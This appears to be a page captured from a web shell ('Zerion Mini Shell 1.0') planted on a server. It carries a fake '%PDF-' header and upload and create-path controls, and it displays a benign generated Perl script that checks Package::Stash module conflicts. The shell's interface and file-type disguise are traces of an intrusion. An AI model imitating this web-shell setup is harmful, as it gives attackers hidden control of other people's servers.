%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /home/rs/perl/5.26/bin/
Upload File :
Create Path :
Current File : /home/rs/perl/5.26/bin/package-stash-conflicts

#!/usr/local/perl/5.26/bin/perl

use strict;
use warnings;
# PODNAME: package-stash-conflicts

# this script was generated with Dist::Zilla::Plugin::Conflicts 0.19

use Getopt::Long;
use Package::Stash::Conflicts;

my $verbose;
GetOptions( 'verbose|v' => \$verbose );

if ($verbose) {
    Package::Stash::Conflicts->check_conflicts;
}
else {
    my @conflicts = Package::Stash::Conflicts->calculate_conflicts;
    print "$_\n" for map { $_->{package} } @conflicts;
    exit @conflicts;
}

Zerion Mini Shell 1.0